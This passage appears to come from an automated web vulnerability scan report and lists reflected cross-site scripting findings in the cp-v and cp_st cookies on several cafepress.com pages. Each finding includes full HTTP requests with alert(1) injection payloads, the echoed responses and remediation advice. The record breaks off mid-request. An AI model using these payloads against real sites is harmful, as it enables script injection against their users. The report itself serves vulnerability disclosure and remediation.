The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4954"-alert(1)-"ab20618713b was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cp/info/about/ HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAa4954"-alert(1)-"ab20618713b; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; 
__utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW15
Cteonnt-Length: 46269
Date: Sun, 26 Dec 2010 13:46:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 46269


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.or
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";

   
   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAa4954"-alert(1)-"ab20618713b";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {
       
       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.85. http://www.cafepress.com/cp/info/about/ [cp_st cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /cp/info/about/

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55d2b</script><script>alert(1)</script>e9999fa4cb2 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cp/info/about/ HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=55d2b</script><script>alert(1)</script>e9999fa4cb2; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; 
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW12
Cteonnt-Length: 46295
Date: Sun, 26 Dec 2010 13:46:54 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 46295


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.or
...[SNIP]...
.com';


window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = '/cp/info/about/index.aspx'
window.cafepress.tealeaf.searchTerm = '55d2b</script><script>alert(1)</script>e9999fa4cb2'
window.cafepress.tealeaf.salesChannel = 'Other'
window.cafepress.tealeaf.trafficMedium = 'OMM'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP_0
...[SNIP]...

1.86. http://www.cafepress.com/cp/info/help/index.aspx [cp-v cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /cp/info/help/index.aspx

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8fe61"-alert(1)-"a4da02b5a1a was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cp/info/help/index.aspx?page=privacy_policy.aspx HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA8fe61"-alert(1)-"a4da02b5a1a; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; 
__utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW28
ntCoent-Length: 58704
Date: Sun, 26 Dec 2010 13:46:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 58704


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.or
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";

   
   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA8fe61"-alert(1)-"a4da02b5a1a";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {
       
       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.87. http://www.cafepress.com/cp/info/help/index.aspx [cp_st cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /cp/info/help/index.aspx

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1161</script><script>alert(1)</script>2e613423535 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cp/info/help/index.aspx?page=privacy_policy.aspx HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=f1161</script><script>alert(1)</script>2e613423535; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; 
tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW21
Cteonnt-Length: 58725
Date: Sun, 26 Dec 2010 13:46:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 58725


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.or
...[SNIP]...
n_us = 'cafepress.com';


window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'HelpPage'
window.cafepress.tealeaf.searchTerm = 'f1161</script><script>alert(1)</script>2e613423535'
window.cafepress.tealeaf.salesChannel = 'Other'
window.cafepress.tealeaf.trafficMedium = 'OMM'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C,EXP_0
...[SNIP]...

1.88. http://www.cafepress.com/cp/info/help/tos.aspx [cp-v cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /cp/info/help/tos.aspx

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d434d"-alert(1)-"e31525dd84b was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cp/info/help/tos.aspx HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAd434d"-alert(1)-"e31525dd84b; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; 
__utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW17
Cteonnt-Length: 60935
Date: Sun, 26 Dec 2010 13:46:52 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 60935


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.or
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";

   
   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAd434d"-alert(1)-"e31525dd84b";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {
       
       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.89. http://www.cafepress.com/cp/info/help/tos.aspx [cp_st cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cafepress.com
Path:   /cp/info/help/tos.aspx

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dc886</script><script>alert(1)</script>e31d106e7a6 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cp/info/help/tos.aspx HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=dc886</script><script>alert(1)</script>e31d106e7a6; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; 